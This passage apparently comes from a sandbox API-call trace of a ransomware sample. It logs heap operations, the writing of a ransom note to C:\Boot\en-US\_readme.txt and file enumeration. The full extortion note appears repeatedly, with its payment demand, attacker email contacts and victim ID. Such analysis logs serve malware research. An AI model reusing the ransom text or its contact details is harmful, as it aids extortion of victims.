hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.656] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.656] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.656] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.656] PathFindFileNameW (pszPath="") returned="" [0173.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.656] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.657] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.657] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.658] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3a8ca68 [0173.658] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0173.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.658] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0173.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.658] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.658] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.658] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.659] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.659] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.660] CloseHandle (hObject=0x690) returned 1 [0173.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.660] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4b30a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4b30a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.661] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e4b30a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4b30a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.661] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.661] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0173.661] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e4b30a0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e4b30a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e4b30a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, 